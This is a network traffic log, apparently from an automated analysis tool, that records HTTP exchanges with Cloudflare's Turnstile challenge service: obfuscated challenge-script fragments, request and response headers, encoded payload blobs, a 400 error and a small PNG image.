2025-01-14 16:14:07 UTC	1369	IN	Data Raw: 68 72 3d 68 70 2c 65 4d 5b 68 72 28 36 37 34 29 5d 28 6f 2c 75 6e 64 65 66 69 6e 65 64 2c 6b 5b 68 72 28 31 34 35 34 29 5d 29 7d 2c 31 30 29 2c 65 4d 5b 68 70 28 31 31 33 32 29 5d 28 66 75 6e 63 74 69 6f 6e 28 68 73 29 7b 68 73 3d 68 70 2c 65 4d 5b 68 73 28 39 36 35 29 5d 28 29 7d 2c 31 65 33 29 2c 65 4d 5b 68 70 28 31 36 32 37 29 5d 5b 68 70 28 31 32 35 34 29 5d 28 68 70 28 31 37 33 34 29 2c 65 29 29 3b 72 65 74 75 72 6e 21 5b 5d 7d 2c 66 37 3d 30 2c 66 61 3d 7b 7d 2c 66 61 5b 67 4a 28 36 31 31 29 5d 3d 66 39 2c 65 4d 5b 67 4a 28 31 34 36 37 29 5d 3d 66 61 2c 66 63 3d 65 4d 5b 67 4a 28 37 34 38 29 5d 5b 67 4a 28 31 30 30 31 29 5d 5b 67 4a 28 31 31 33 38 29 5d 2c 66 64 3d 65 4d 5b 67 4a 28 37 34 38 29 5d 5b 67 4a 28 31 30 30 31 29 5d 5b 67 4a 28 37 35 39 Data Ascii: hr=hp,eM[hr(674)](o,undefined,k[hr(1454)])},10),eM[hp(1132)](function(hs){hs=hp,eM[hs(965)]()},1e3),eM[hp(1627)][hp(1254)](hp(1734),e));return![]},f7=0,fa={},fa[gJ(611)]=f9,eM[gJ(1467)]=fa,fc=eM[gJ(748)][gJ(1001)][gJ(1138)],fd=eM[gJ(748)][gJ(1001)][gJ(759
2025-01-14 16:14:07 UTC	1369	IN	Data Raw: 31 35 33 33 29 5d 3d 67 39 2c 67 61 3d 66 75 6e 63 74 69 6f 6e 28 66 2c 69 52 2c 67 2c 68 2c 69 2c 6a 2c 6b 2c 6c 2c 6d 29 7b 66 6f 72 28 69 52 3d 67 4a 2c 67 3d 7b 7d 2c 67 5b 69 52 28 34 31 37 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 6e 2c 73 29 7b 72 65 74 75 72 6e 20 73 7c 6e 7d 2c 67 5b 69 52 28 31 36 36 35 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 6e 2c 73 29 7b 72 65 74 75 72 6e 20 6e 3e 3e 73 7d 2c 67 5b 69 52 28 37 33 36 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 6e 2c 73 29 7b 72 65 74 75 72 6e 20 73 3d 3d 3d 6e 7d 2c 67 5b 69 52 28 31 32 32 31 29 5d 3d 69 52 28 36 30 31 29 2c 67 5b 69 52 28 34 32 36 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 6e 2c 73 29 7b 72 65 74 75 72 6e 20 6e 2b 73 7d 2c 67 5b 69 52 28 38 30 34 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 6e 2c 73 29 7b 72 Data Ascii: 1533)]=g9,ga=function(f,iR,g,h,i,j,k,l,m){for(iR=gJ,g={},g[iR(417)]=function(n,s){return s\|n},g[iR(1665)]=function(n,s){return n>>s},g[iR(736)]=function(n,s){return s===n},g[iR(1221)]=iR(601),g[iR(426)]=function(n,s){return n+s},g[iR(804)]=function(n,s){r
2025-01-14 16:14:07 UTC	1369	IN	Data Raw: 7d 2c 27 79 50 51 48 47 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 45 75 77 46 4e 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3e 69 7d 2c 27 58 76 64 79 73 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3d 3d 69 7d 2c 27 73 53 41 43 4e 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 72 4e 45 6f 6c 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 3c 69 7d 2c 27 4a 66 52 6f 43 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 26 69 7d 2c 27 4a 77 45 46 42 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 3d 3d 68 7d 2c 27 44 4e 4a 47 58 27 3a 66 75 Data Ascii: },'yPQHG':function(h,i){return h(i)},'EuwFN':function(h,i){return h>i},'Xvdys':function(h,i){return h==i},'sSACN':function(h,i){return h(i)},'rNEol':function(h,i){return h<<i},'JfRoC':function(h,i){return h&i},'JwEFB':function(h,i){return i==h},'DNJGX':fu
2025-01-14 16:14:07 UTC	1369	IN	Data Raw: 31 27 3a 78 5b 4c 5d 3d 45 2b 2b 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 32 27 3a 69 66 28 4f 62 6a 65 63 74 5b 69 58 28 36 37 38 29 5d 5b 69 58 28 31 37 32 32 29 5d 5b 69 58 28 37 31 32 29 5d 28 42 2c 43 29 29 7b 69 66 28 32 35 36 3e 43 5b 69 58 28 31 32 33 35 29 5d 28 30 29 29 7b 66 6f 72 28 73 3d 30 3b 64 5b 69 58 28 31 35 31 32 29 5d 28 73 2c 46 29 3b 48 3c 3c 3d 31 2c 64 5b 69 58 28 39 35 38 29 5d 28 49 2c 6a 2d 31 29 3f 28 49 3d 30 2c 47 5b 69 58 28 35 35 35 29 5d 28 6f 28 48 29 29 2c 48 3d 30 29 3a 49 2b 2b 2c 73 2b 2b 29 3b 66 6f 72 28 4f 3d 43 5b 69 58 28 31 32 33 35 29 5d 28 30 29 2c 73 3d 30 3b 38 3e 73 3b 48 3d 48 3c 3c 31 2e 39 7c 31 2e 34 38 26 4f 2c 6a 2d 31 3d 3d 49 3f 28 49 3d 30 2c 47 5b 69 58 28 35 35 35 29 5d 28 6f 28 48 29 29 2c Data Ascii: 1':x[L]=E++;continue;case'2':if(Object[iX(678)][iX(1722)][iX(712)](B,C)){if(256>C[iX(1235)](0)){for(s=0;d[iX(1512)](s,F);H<<=1,d[iX(958)](I,j-1)?(I=0,G[iX(555)](o(H)),H=0):I++,s++);for(O=C[iX(1235)](0),s=0;8>s;H=H<<1.9\|1.48&O,j-1==I?(I=0,G[iX(555)](o(H)),

Timestamp	Bytes transferred	Direction	Data
2025-01-14 16:14:07 UTC	1170	OUT	POST /cdn-cgi/challenge-platform/h/b/flow/ov1/427550357:1736867636:Hrl0drLFPAO-Ioo5MdhbNq5JwydQFL51g-oXKOylUNU/901eeac43f625e71/wivrWOqgzMaSNvT90f5ud0goLwhNn4dJ1uoC04MkNso-1736871245-1.1.1.1-zygmDrQxBhbZIvDYFOJlI2b..poU6XvxCfcufR43J.N.teb5vickgSAhTQDFz74X HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive Content-Length: 3247 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" Content-type: application/x-www-form-urlencoded CF-Chl-RetryAttempt: 0 sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 CF-Challenge: wivrWOqgzMaSNvT90f5ud0goLwhNn4dJ1uoC04MkNso-1736871245-1.1.1.1-zygmDrQxBhbZIvDYFOJlI2b..poU6XvxCfcufR43J.N.teb5vickgSAhTQDFz74X sec-ch-ua-platform: "Windows" Accept: / Origin: https://challenges.cloudflare.com Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/z7irz/0x4AAAAAAA4tBTMXY0JFkmlC/auto/fbE/normal/auto/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-14 16:14:07 UTC	3247	OUT	Data Raw: 76 5f 39 30 31 65 65 61 63 34 33 66 36 32 35 65 37 31 3d 49 7a 4a 65 57 65 39 65 6d 65 41 65 54 6a 79 5a 6a 79 44 65 6a 37 34 6b 43 53 37 79 30 6a 4e 4e 79 24 48 79 34 76 65 6a 78 79 6c 65 34 4a 53 34 4b 78 4a 79 58 66 78 79 4c 70 6a 55 49 79 4f 65 6a 44 4a 79 34 33 52 7a 32 45 79 33 6b 79 46 79 6a 7a 79 33 4a 25 32 62 76 79 48 79 32 76 34 4e 79 6b 76 66 4a 79 6d 43 79 32 53 79 6e 75 4a 32 44 69 65 34 63 79 51 4b 71 2d 4a 79 67 43 71 53 32 33 6f 51 38 77 2d 32 6d 74 65 4c 63 79 67 71 37 6a 69 74 6d 36 63 79 45 6f 65 79 4d 70 79 53 6d 67 4a 62 73 54 68 24 36 59 53 71 75 37 66 67 69 36 57 44 65 34 33 71 4c 70 65 63 2b 59 62 2b 6d 7a 79 54 65 6a 50 75 49 4d 52 2b 70 70 79 47 70 4d 6c 4e 45 65 46 79 66 50 7a 79 66 4a 52 69 45 6d 53 45 79 79 50 6b 79 79 31 4e Data Ascii: v_901eeac43f625e71=IzJeWe9emeAeTjyZjyDej74kCS7y0jNNy$Hy4vejxyle4JS4KxJyXfxyLpjUIyOejDJy43Rz2Ey3kyFyjzy3J%2bvyHy2v4NykvfJymCy2SynuJ2Die4cyQKq-JygCqS23oQ8w-2mteLcygq7jitm6cyEoeyMpySmgJbsTh$6YSqu7fgi6WDe43qLpec+Yb+mzyTejPuIMR+ppyGpMlNEeFyfPzyfJRiEmSEyyPkyy1N
2025-01-14 16:14:07 UTC	751	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 16:14:07 GMT Content-Type: text/plain; charset=UTF-8 Content-Length: 152952 Connection: close cf-chl-gen: JpV1Tw38jfur8QUjOgJ4ceopQkVP847JYfYtzmD8lI2rzeuy/0xHvIQNF5HdOQ7zIvZEf0q5R3kHdq/WgLqgtS8khtsDTR96okD8By61whWhH9O41m6BmUzlsSwjtOzHo7t1RhcWqd0IRwcCLFmmtuBpGZlRrFIAR6G3gvATecXopyBhOm7a5b5gZkWvULsJbKBxbFxYkc0Op/F1Gu3XSjekQ2w5k7KMBzgWe6/xhvPJ1UeChuAcDLcPPoLxsUPHqXCfWtH8VicUBwlovEq597Z8sBZLk7K0wlPSw782WfryssIKNg3PIJGGSSdQdbAwDBzmFvklXJh3uBxQiyJSuIY57P0IXlMWdJYB+6Pnq6cWdzU7Qs+FR/FTxleibMJJixCLlwJL029GLdZvuzn67Xcwc+74T6WsL0BCl0hIUp0a3uwyUs2/wDruh0MB/NE3JE0ILzN599BF4Ij9ZAdm3vuCWJHhY9h+cMre6uX7f/k=$Ln5zOOZVnf3dTIHZWWfkig== Server: cloudflare CF-RAY: 901eeacedd3d42e5-EWR alt-svc: h3=":443"; ma=86400
2025-01-14 16:14:07 UTC	618	IN	Data Raw: 73 6f 39 33 64 4a 4b 57 78 63 4f 2f 71 61 47 71 70 4c 61 32 76 71 79 75 7a 4d 36 37 6f 6f 32 7a 6c 71 6d 78 75 4a 71 57 32 64 50 4a 79 4b 36 77 71 37 4f 38 6e 37 4f 6b 35 4b 6a 59 34 61 33 6b 76 38 50 42 71 39 44 48 71 39 47 30 7a 66 6a 6f 7a 2b 58 6d 32 64 6e 7a 37 4d 72 66 2f 50 62 30 33 73 62 79 39 2b 7a 61 33 76 6e 33 33 63 6b 4a 2b 38 33 75 39 64 4c 6a 31 74 50 56 2b 4e 58 33 2f 42 50 5a 2b 77 50 79 37 76 73 48 42 77 4d 68 35 76 66 6d 35 2b 59 6b 4c 51 59 49 4a 79 41 32 4d 51 38 43 2b 54 63 34 43 78 67 66 48 76 30 79 49 79 4d 50 4a 6a 38 32 50 41 73 6a 52 45 68 51 52 44 38 2f 44 46 45 2f 4c 55 77 71 43 31 55 59 57 7a 6c 56 54 78 31 4e 50 56 49 69 59 52 78 5a 5a 54 39 62 59 43 5a 4c 52 30 70 51 61 57 70 53 50 7a 52 4b 54 69 38 32 5a 53 31 63 66 58 52 Data Ascii: so93dJKWxcO/qaGqpLa2vqyuzM67oo2zlqmxuJqW2dPJyK6wq7O8n7Ok5KjY4a3kv8PBq9DHq9G0zfjoz+Xm2dnz7Mrf/Pb03sby9+za3vn33ckJ+83u9dLj1tPV+NX3/BPZ+wPy7vsHBwMh5vfm5+YkLQYIJyA2MQ8C+Tc4CxgfHv0yIyMPJj82PAsjREhQRD8/DFE/LUwqC1UYWzlVTx1NPVIiYRxZZT9bYCZLR0pQaWpSPzRKTi82ZS1cfXR
2025-01-14 16:14:07 UTC	1369	IN	Data Raw: 4e 5a 69 47 31 69 63 47 39 78 5a 49 65 4d 6b 58 78 78 69 49 69 63 67 59 43 69 6c 59 47 59 64 4b 4f 52 65 4a 5a 33 69 34 56 35 70 49 4e 73 70 47 32 6f 68 34 47 50 68 4b 61 6c 69 62 56 35 72 62 31 39 66 35 61 33 73 35 61 76 70 72 54 43 6c 36 69 67 76 36 57 75 79 63 69 6b 6b 6f 75 74 30 38 69 6a 74 74 43 32 74 74 2f 61 75 61 2f 62 33 64 37 4e 6d 4e 36 66 34 62 54 46 36 38 57 72 79 4f 33 66 36 36 57 7a 77 4e 44 4f 72 75 50 52 73 74 6d 33 33 4d 69 35 33 37 37 76 7a 51 62 57 39 66 54 30 32 65 41 4c 2b 75 30 52 41 50 6f 46 46 65 59 55 36 76 62 72 36 41 2f 58 7a 75 58 79 47 68 51 42 46 66 33 68 39 43 45 41 33 68 38 6c 42 66 51 6a 4b 51 6a 77 4a 79 30 4d 35 69 73 78 45 44 6f 76 4e 52 54 7a 4d 7a 6b 59 51 54 63 39 48 41 41 37 51 53 41 42 50 30 55 6c 49 45 4e 4a 4b Data Ascii: NZiG1icG9xZIeMkXxxiIicgYCilYGYdKOReJZ3i4V5pINspG2oh4GPhKalibV5rb19f5a3s5avprTCl6igv6Wuycikkout08ijttC2tt/aua/b3d7NmN6f4bTF68WryO3f66WzwNDOruPRstm33Mi5377vzQbW9fT02eAL+u0RAPoFFeYU6vbr6A/XzuXyGhQBFf3h9CEA3h8lBfQjKQjwJy0M5isxEDovNRTzMzkYQTc9HAA7QSABP0UlIENJK
2025-01-14 16:14:07 UTC	1369	IN	Data Raw: 44 63 34 31 6f 55 32 36 4e 64 59 68 2f 63 6d 2b 6a 6c 57 2b 69 6e 5a 4b 69 64 70 52 6a 6d 36 4a 72 6f 6d 71 4a 62 6f 43 67 6b 33 4f 45 75 62 6c 35 69 4a 69 52 6a 4c 61 66 77 5a 35 2f 73 72 47 30 73 38 65 64 6b 34 53 75 72 5a 37 43 71 36 61 46 77 59 66 4d 31 4d 4b 77 79 36 2f 49 7a 4d 36 30 74 35 6e 51 75 4e 76 67 34 4c 33 68 71 64 79 2f 35 74 6a 67 77 2b 50 63 35 4d 66 6f 7a 64 54 45 35 74 69 35 33 50 6e 37 75 63 6e 54 37 62 6e 36 37 39 2b 34 41 74 76 56 78 4f 6e 44 44 4f 48 42 32 78 45 47 34 42 4c 7a 44 66 66 71 37 42 4d 51 46 68 58 75 47 39 77 41 2b 64 58 34 42 42 30 68 33 75 50 71 4a 66 34 65 48 53 34 49 2f 4f 34 51 41 53 67 6d 39 66 67 7a 39 7a 51 64 45 50 51 61 43 77 45 38 4f 76 74 47 51 79 55 31 4d 67 4e 44 50 43 38 74 53 78 6f 37 52 7a 56 4f 50 7a Data Ascii: Dc41oU26NdYh/cm+jlW+inZKidpRjm6JromqJboCgk3OEubl5iJiRjLafwZ5/srG0s8edk4SurZ7Cq6aFwYfM1MKwy6/IzM60t5nQuNvg4L3hqdy/5tjgw+Pc5MfozdTE5ti53Pn7ucnT7bn679+4AtvVxOnDDOHB2xEG4BLzDffq7BMQFhXuG9wA+dX4BB0h3uPqJf4eHS4I/O4QASgm9fgz9zQdEPQaCwE8OvtGQyU1MgNDPC8tSxo7RzVOPz
2025-01-14 16:14:07 UTC	1369	IN	Data Raw: 6d 48 64 62 6c 70 78 37 58 4a 71 67 67 48 75 65 70 49 53 41 70 34 79 65 6d 58 36 4a 6f 6e 52 74 64 6e 47 41 73 34 57 58 75 48 52 35 6a 37 53 68 65 4a 6d 69 73 34 61 66 67 63 65 48 69 59 57 6c 7a 6f 2b 4a 71 64 4c 47 6b 4b 6e 53 77 4d 47 58 7a 35 53 79 74 73 7a 4b 7a 4e 48 56 31 37 6e 54 73 38 69 6d 78 4e 7a 42 37 4b 57 6c 33 72 33 4c 77 4f 50 6e 30 4d 37 74 73 73 2f 7a 39 63 75 76 31 39 48 6f 30 4d 75 38 32 73 54 6e 30 39 48 58 2b 64 30 48 42 2f 6e 4b 43 67 6e 6f 79 51 58 6e 43 78 54 72 2b 52 48 62 45 42 67 50 43 4e 6e 58 48 2f 54 2b 2b 69 50 6b 35 2b 4d 57 2f 68 72 35 42 65 6b 44 49 68 49 78 38 69 58 77 4b 69 49 6c 49 2f 62 32 2b 2f 34 53 2f 53 6f 2f 52 55 41 79 44 77 49 37 4a 6b 52 43 4e 54 73 58 53 55 56 4e 48 30 52 52 45 69 51 31 43 79 4d 72 57 56 77 Data Ascii: mHdblpx7XJqggHuepISAp4yemX6JonRtdnGAs4WXuHR5j7SheJmis4afgceHiYWlzo+JqdLGkKnSwMGXz5SytszKzNHV17nTs8imxNzB7KWl3r3LwOPn0M7tss/z9cuv19Ho0Mu82sTn09HX+d0HB/nKCgnoyQXnCxTr+RHbEBgPCNnXH/T++iPk5+MW/hr5BekDIhIx8iXwKiIlI/b2+/4S/So/RUAyDwI7JkRCNTsXSUVNH0RREiQ1CyMrWVw
2025-01-14 16:14:07 UTC	1369	IN	Data Raw: 5a 39 69 63 5a 4a 6e 6c 33 71 72 71 6d 52 34 61 61 32 51 71 4a 42 79 67 61 57 67 70 6f 4f 47 73 4c 69 4b 6e 62 78 39 6b 4c 35 32 6a 70 62 49 78 34 61 66 78 36 68 2f 6e 59 6d 76 69 37 79 64 30 71 71 33 6b 4b 47 52 70 63 7a 5a 79 74 33 59 73 39 61 75 34 71 2f 6d 34 75 61 7a 79 74 36 30 34 75 6d 6e 37 4f 44 4e 72 75 6e 42 35 65 37 58 7a 4d 7a 35 2b 66 57 7a 79 4f 6e 78 30 77 48 35 38 39 54 32 32 77 62 59 33 51 4d 42 78 63 51 42 33 50 37 6f 34 42 48 74 41 42 48 76 46 67 58 36 37 42 73 5a 31 66 6a 64 44 43 58 73 4a 4f 55 48 39 69 59 45 35 79 72 6e 48 66 6f 46 48 66 30 43 35 75 34 47 41 52 51 58 38 76 73 48 47 78 77 68 4c 6b 4c 35 50 44 59 61 4a 44 6b 52 48 77 67 63 52 30 55 59 51 67 77 73 55 53 30 31 45 44 5a 43 52 43 49 6d 4a 68 55 5a 4f 31 4a 4c 55 44 67 57 Data Ascii: Z9icZJnl3qrqmR4aa2QqJBygaWgpoOGsLiKnbx9kL52jpbIx4afx6h/nYmvi7yd0qq3kKGRpczZyt3Ys9au4q/m4uazyt604umn7ODNrunB5e7XzMz5+fWzyOnx0wH589T22wbY3QMBxcQB3P7o4BHtABHvFgX67BsZ1fjdDCXsJOUH9iYE5yrnHfoFHf0C5u4GARQX8vsHGxwhLkL5PDYaJDkRHwgcR0UYQgwsUS01EDZCRCImJhUZO1JLUDgW
2025-01-14 16:14:07 UTC	1369	IN	Data Raw: 32 6f 6a 71 47 73 6a 33 31 79 6b 62 57 73 73 34 65 50 61 37 53 6a 64 58 4f 76 64 58 64 36 73 4c 79 76 70 49 43 6f 75 38 4b 34 6f 4d 7a 41 76 49 71 36 68 37 2b 6d 69 70 53 65 6b 4b 6e 56 72 64 47 61 70 70 54 56 75 74 58 52 34 63 50 53 33 75 48 45 30 38 71 38 76 72 65 74 36 65 44 72 33 2b 7a 42 7a 2b 71 74 77 50 62 6b 78 75 72 4d 31 74 54 30 2b 66 62 77 77 51 57 2f 78 4e 37 61 32 39 75 2b 2f 4f 55 42 2f 4f 72 6c 37 77 45 56 34 68 51 46 47 65 59 63 48 41 62 72 47 76 7a 54 38 64 30 45 33 78 48 78 4a 2f 34 47 48 53 6f 62 48 69 6b 45 4a 75 6a 77 4e 69 33 2b 47 43 6f 56 4e 68 77 49 4a 2f 77 70 44 44 6f 77 4e 6b 55 43 51 6b 56 46 4e 79 73 49 47 78 63 48 44 53 4d 77 4d 77 30 64 4d 30 78 54 4c 7a 49 5a 4c 30 63 36 4c 44 6c 4b 51 79 38 39 4f 30 52 47 4d 54 34 30 58 Data Ascii: 2ojqGsj31ykbWss4ePa7SjdXOvdXd6sLyvpICou8K4oMzAvIq6h7+mipSekKnVrdGappTVutXR4cPS3uHE08q8vret6eDr3+zBz+qtwPbkxurM1tT0+fbwwQW/xN7a29u+/OUB/Orl7wEV4hQFGeYcHAbrGvzT8d0E3xHxJ/4GHSobHikEJujwNi3+GCoVNhwIJ/wpDDowNkUCQkVFNysIGxcHDSMwMw0dM0xTLzIZL0c6LDlKQy89O0RGMT40X
2025-01-14 16:14:07 UTC	1369	IN	Data Raw: 46 6e 32 61 77 6f 4b 64 33 6d 58 4b 7a 6b 70 32 32 74 72 4f 65 75 61 36 68 73 63 43 6c 67 36 50 4b 74 61 32 6d 69 59 76 50 78 63 4c 50 7a 73 71 74 70 70 69 53 78 36 33 61 30 64 61 64 6c 74 54 63 73 38 54 63 32 4e 4b 66 36 72 62 43 35 4c 66 70 37 75 62 67 35 38 76 4a 73 2b 72 53 35 4b 2f 6f 31 50 33 63 38 4e 6d 33 30 50 7a 62 42 66 6f 42 33 38 50 2b 42 65 50 45 41 77 6e 6f 34 77 63 4e 37 4f 67 51 39 41 63 43 35 76 45 4c 33 4e 58 65 32 65 67 63 37 51 41 54 49 67 49 4a 42 4f 48 70 41 79 62 70 2b 42 38 66 43 50 41 64 45 51 77 70 42 50 67 52 4e 52 41 6d 4d 43 38 58 4f 66 6f 33 4f 78 42 44 4d 45 6a 36 53 51 6f 66 48 6b 30 4f 53 41 73 67 51 7a 77 30 4d 42 49 74 4e 56 42 57 52 69 74 4f 4b 6a 5a 50 4c 54 63 78 4f 30 38 39 4d 31 73 6f 48 56 55 74 57 7a 6b 72 59 6b Data Ascii: Fn2awoKd3mXKzkp22trOeua6hscClg6PKta2miYvPxcLPzsqtppiSx63a0dadltTcs8Tc2NKf6rbC5Lfp7ubg58vJs+rS5K/o1P3c8Nm30PzbBfoB38P+BePEAwno4wcN7OgQ9AcC5vEL3NXe2egc7QATIgIJBOHpAybp+B8fCPAdEQwpBPgRNRAmMC8XOfo3OxBDMEj6SQofHk0OSAsgQzw0MBItNVBWRitOKjZPLTcxO089M1soHVUtWzkrYk
2025-01-14 16:14:07 UTC	1369	IN	Data Raw: 71 5a 6d 6a 6a 36 36 65 63 5a 47 78 75 4c 2b 51 6e 5a 47 47 69 4c 4f 46 6d 49 61 69 68 63 4b 4b 72 5a 37 4a 6b 71 72 49 79 59 71 75 74 74 47 57 79 39 44 52 33 37 69 5a 6d 39 58 51 74 74 2b 35 31 4f 44 6e 77 64 36 70 34 38 4c 68 72 63 79 38 7a 50 65 76 2b 65 66 5a 35 62 54 6f 74 73 6a 53 31 77 54 6b 31 64 7a 33 35 4e 72 65 78 64 7a 64 34 65 6e 50 35 66 48 4d 37 65 59 47 39 51 44 72 43 2f 72 4e 37 51 34 56 48 4f 7a 35 37 65 4c 6b 45 4f 48 30 41 51 51 63 4a 75 55 49 43 75 72 6f 44 43 51 67 2f 68 41 53 42 4f 34 56 47 52 48 7a 4c 6a 55 7a 2b 54 4c 39 2f 42 77 32 4a 30 41 63 4f 52 63 55 41 79 55 75 4a 53 41 2b 4c 31 4d 6e 52 6a 4d 6b 46 69 38 33 55 79 55 31 46 6c 67 72 55 6c 68 4d 4d 56 51 65 5a 7a 56 58 4e 31 34 6c 52 44 70 46 4f 56 38 2b 55 55 64 4d 65 46 67 Data Ascii: qZmjj66ecZGxuL+QnZGGiLOFmIaihcKKrZ7JkqrIyYquttGWy9DR37iZm9XQtt+51ODnwd6p48Lhrcy8zPev+efZ5bTotsjS1wTk1dz35Nrexdzd4enP5fHM7eYG9QDrC/rN7Q4VHOz57eLkEOH0AQQcJuUICuroDCQg/hASBO4VGRHzLjUz+TL9/Bw2J0AcORcUAyUuJSA+L1MnRjMkFi83UyU1FlgrUlhMMVQeZzVXN14lRDpFOV8+UUdMeFg
2025-01-14 16:14:07 UTC	1369	IN	Data Raw: 6e 6d 76 66 5a 69 59 6e 70 61 54 67 70 2b 42 77 59 79 68 7a 37 43 4b 70 35 32 53 68 72 47 6d 71 61 72 4b 71 63 4f 6f 75 4b 71 34 72 38 32 2b 34 72 62 57 32 4c 4f 6c 76 73 62 69 74 4d 53 6c 35 37 72 68 35 50 4c 41 34 73 4c 70 73 4d 2f 46 30 4d 54 71 7a 66 50 55 38 74 49 45 32 50 54 52 41 4e 48 30 77 63 4c 43 34 77 44 62 45 75 33 68 2f 75 7a 76 43 42 4c 52 38 2f 58 57 31 50 63 51 44 4f 72 38 37 65 50 32 41 41 4d 6d 33 67 41 49 38 79 34 4a 49 4f 2f 6e 49 75 30 73 41 53 54 78 4e 77 30 54 43 68 48 37 47 67 73 32 2f 68 63 31 4e 67 41 63 2f 68 44 2b 4b 6b 41 6d 49 44 38 66 53 77 70 44 43 6c 4d 68 51 42 49 6c 45 79 39 63 4f 53 64 4a 46 79 6b 7a 4f 47 52 46 4e 6a 31 59 52 54 73 2f 4a 6a 31 42 52 53 5a 6e 51 6b 30 2b 4d 7a 46 53 51 6b 31 50 55 54 56 57 55 47 35 31 Data Ascii: nmvfZiYnpaTgp+BwYyhz7CKp52ShrGmqarKqcOouKq4r82+4rbW2LOlvsbitMSl57rh5PLA4sLpsM/F0MTqzfPU8tIE2PTRANH0wcLC4wDbEu3h/uzvCBLR8/XW1PcQDOr87eP2AAMm3gAI8y4JIO/nIu0sASTxNw0TChH7Ggs2/hc1NgAc/hD+KkAmID8fSwpDClMhQBIlEy9cOSdJFykzOGRFNj1YRTs/Jj1BRSZnQk0+MzFSQk1PUTVWUG51

Timestamp	Bytes transferred	Direction	Data
2025-01-14 16:14:08 UTC	598	OUT	GET /cdn-cgi/challenge-platform/h/b/flow/ov1/427550357:1736867636:Hrl0drLFPAO-Ioo5MdhbNq5JwydQFL51g-oXKOylUNU/901eeac43f625e71/wivrWOqgzMaSNvT90f5ud0goLwhNn4dJ1uoC04MkNso-1736871245-1.1.1.1-zygmDrQxBhbZIvDYFOJlI2b..poU6XvxCfcufR43J.N.teb5vickgSAhTQDFz74X HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-14 16:14:08 UTC	442	IN	HTTP/1.1 400 Bad Request Date: Tue, 14 Jan 2025 16:14:08 GMT Content-Type: application/json Content-Length: 14 Connection: close cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 cf-chl-out: boId/bpbjLEYvZfVD1iylWUgfzunRU1Fap/s7nWvdnkqwVGsnhPAigT7jL8YsP4IVOj5vOLzAidSn8snzRZYGw==$I8iPaqBtqYgiL7VoAc8O0g== Server: cloudflare CF-RAY: 901eead4c9ed42c9-EWR alt-svc: h3=":443"; ma=86400
2025-01-14 16:14:08 UTC	14	IN	Data Raw: 7b 22 65 72 72 22 3a 31 30 30 32 33 30 7d Data Ascii: {"err":100230}

Timestamp	Bytes transferred	Direction	Data
2025-01-14 16:14:08 UTC	782	OUT	GET /cdn-cgi/challenge-platform/h/b/i/901eeac43f625e71/1736871247206/f37lvsh0JO71dIb HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/z7irz/0x4AAAAAAA4tBTMXY0JFkmlC/auto/fbE/normal/auto/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-14 16:14:08 UTC	200	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 16:14:08 GMT Content-Type: image/png Content-Length: 61 Connection: close Server: cloudflare CF-RAY: 901eead72fd032fc-EWR alt-svc: h3=":443"; ma=86400
2025-01-14 16:14:08 UTC	61	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 31 00 00 00 0c 08 02 00 00 00 44 1a c2 38 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82 Data Ascii: PNGIHDR1D8IDAT$IENDB`

Timestamp	Bytes transferred	Direction	Data
